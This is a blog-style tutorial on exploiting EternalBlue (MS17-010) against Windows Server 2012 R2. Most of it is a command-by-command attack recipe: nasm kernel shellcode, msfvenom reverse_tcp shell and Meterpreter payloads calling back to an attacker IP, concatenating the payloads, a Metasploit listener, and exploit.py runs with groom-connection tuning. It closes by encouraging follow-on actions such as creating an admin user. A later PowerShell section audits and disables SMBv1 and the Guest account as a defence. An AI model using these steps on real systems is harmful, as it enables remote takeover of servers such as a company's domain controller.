How to Attack Windows Server 2012 R2 Using Eternalblue

M'hirsi Hamza
Nov 10, 2020 · 4 min read
Windows Server 2012 R2 Exploit

Hi Medium! Here we are again with a new article. Today we will share a small tutorial in which we attack a Windows Server 2012 R2, which in many cases is a company's AD server. In my last article I showed how to attack Windows 7; if you want to read it, check this link.

Today we will do it two ways: in the first we get shell access, and in the second we get a Meterpreter session:

1 — Prepare the environment

In this tutorial we need a Kali Linux machine and a Windows Server 2012 R2. Before we begin, we need to run these commands to update our Kali OS:

$ apt-get update
$ apt-get upgrade

We need to power on the Windows Server and get its IP address. If you are on a pentesting engagement and you don't have the target IP address, you just need to run a network scan using nmap:

$ nmap -v -Pn -O <ip range>

2 — Create our shellcode

+ First we need to download the shellcode developed by Sleepya from this link, then we assemble it using nasm (you can download nasm from this link) with this command:

$ nasm -f bin eternalblue_x64_kshellcode.asm

Now we generate the payloads using msfvenom: the first one will give us a reverse shell over TCP and the second a Meterpreter session:

— Reverse Shell :

$ msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=<attacker_ip> LPORT=1234

— Meterpreter session :

$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=<attacker_ip> LPORT=1234

+ We need to join our two shellcodes to perform the attack:

kernel code + shell/reverse_tcp :

$ cat eternalblue_x64_kshellcode shell_msf.bin > reverse_shell.bin

kernel code + meterpreter/reverse_tcp :

$ cat eternalblue_x64_kshellcode meterpreter_msf.bin > meterpreter.bin

3 — Exploit the vulnerability

We now need to download exploit.py from this link. By default the Guest account comes inactive on Windows Server; if it was activated by the administrator we can take advantage of it, and if the administrator gave us an account, that is even better. So we now need to add this information to our exploit:

$ nano  eternalblue8_exploit.py

and change the USERNAME and PASSWORD.

+ Before running the exploit we just need to set up our listener using msfconsole and set the payload:

> use exploit/multi/handler
> set PAYLOAD windows/x64/shell/reverse_tcp
> set LHOST <attacker_ip>
> set LPORT 1234
> exploit

Hey, finally we will run our scripts!! :D

- shell/reverse_tcp :

$ python eternalblue8_exploit.py <IP@of_the_target> reverse_shell.bin 500

- meterpreter/reverse_tcp :

$ python eternalblue8_exploit.py <IP@of_the_target> meterpreter.bin 400

The last parameter (the number after the payload file) is numGroomConn, which sets the number of Groom connections used to reach a contiguous region of kernel pool memory. If the exploit runs but you don't get your access, just increase numGroomConn.
As you can see, we got our access, and now we can run other attacks, create an admin user and mooooore…..
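On the defending side, the walkthrough above only works when the server still accepts SMBv1 and some credential (typically the Guest account) is usable, so the following PowerShell audit, run in an elevated session on the Windows Server 2012 R2 host itself, reports both preconditions and offers to close them. This is an added example, not code from the original article; the function names are mine, the cmdlets are the standard ones shipped with Server 2012 R2, and the Guest check assumes a local account (on a domain controller `net user` acts on the domain Guest instead). Disabling SMBv1 removes the attack surface, but the actual fix for EternalBlue is still installing the MS17-010 security update.

```powershell
# Added defender-side example, not part of the original article.
# Run in an elevated PowerShell session on the Windows Server 2012 R2 host.
# Cmdlets: Get/Set-SmbServerConfiguration, Get/Remove-WindowsFeature, Get-WmiObject.
# Function names are hypothetical (chosen here); the Guest check assumes a local account.

function Get-EternalBlueExposure {
    # EternalBlue is an SMBv1 bug: if the server does not speak SMBv1, the path is closed
    $smb     = Get-SmbServerConfiguration
    $feature = Get-WindowsFeature -Name FS-SMB1
    # The tutorial needs some credential; an enabled Guest account is the usual one
    $guest   = Get-WmiObject -Class Win32_UserAccount `
                   -Filter "Name='Guest' AND LocalAccount=True"

    [pscustomobject]@{
        Smb1ProtocolEnabled  = [bool]$smb.EnableSMB1Protocol
        Smb1FeatureInstalled = [bool]$feature.Installed
        GuestAccountEnabled  = ($null -ne $guest) -and (-not $guest.Disabled)
    }
}

function Disable-EternalBlueExposure {
    # Supports -WhatIf / -Confirm so the change can be previewed before it is applied
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()

    $state = Get-EternalBlueExposure

    if ($state.Smb1ProtocolEnabled -and
        $PSCmdlet.ShouldProcess('SMB server configuration', 'Disable SMBv1')) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    }
    if ($state.Smb1FeatureInstalled -and
        $PSCmdlet.ShouldProcess('FS-SMB1 feature', 'Uninstall')) {
        # Removal completes after a reboot; SMB1-only legacy clients lose access
        Remove-WindowsFeature -Name FS-SMB1 | Out-Null
    }
    if ($state.GuestAccountEnabled -and
        $PSCmdlet.ShouldProcess('Guest account', 'Disable')) {
        net user Guest /active:no | Out-Null
    }
    # Hardening the configuration does not replace the MS17-010 security update
}

# Report the current exposure, then preview the changes; drop -WhatIf to apply them
Get-EternalBlueExposure | Format-List
Disable-EternalBlueExposure -WhatIf
```

Re-run Get-EternalBlueExposure after the reboot to confirm all three values report $false.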

+ References :

https://github.com/UnaPibaGeek

I hope that you enjoyed this article, as always. If you have something to add, don't hesitate to write a comment ^^ and follow me for more interesting articles.
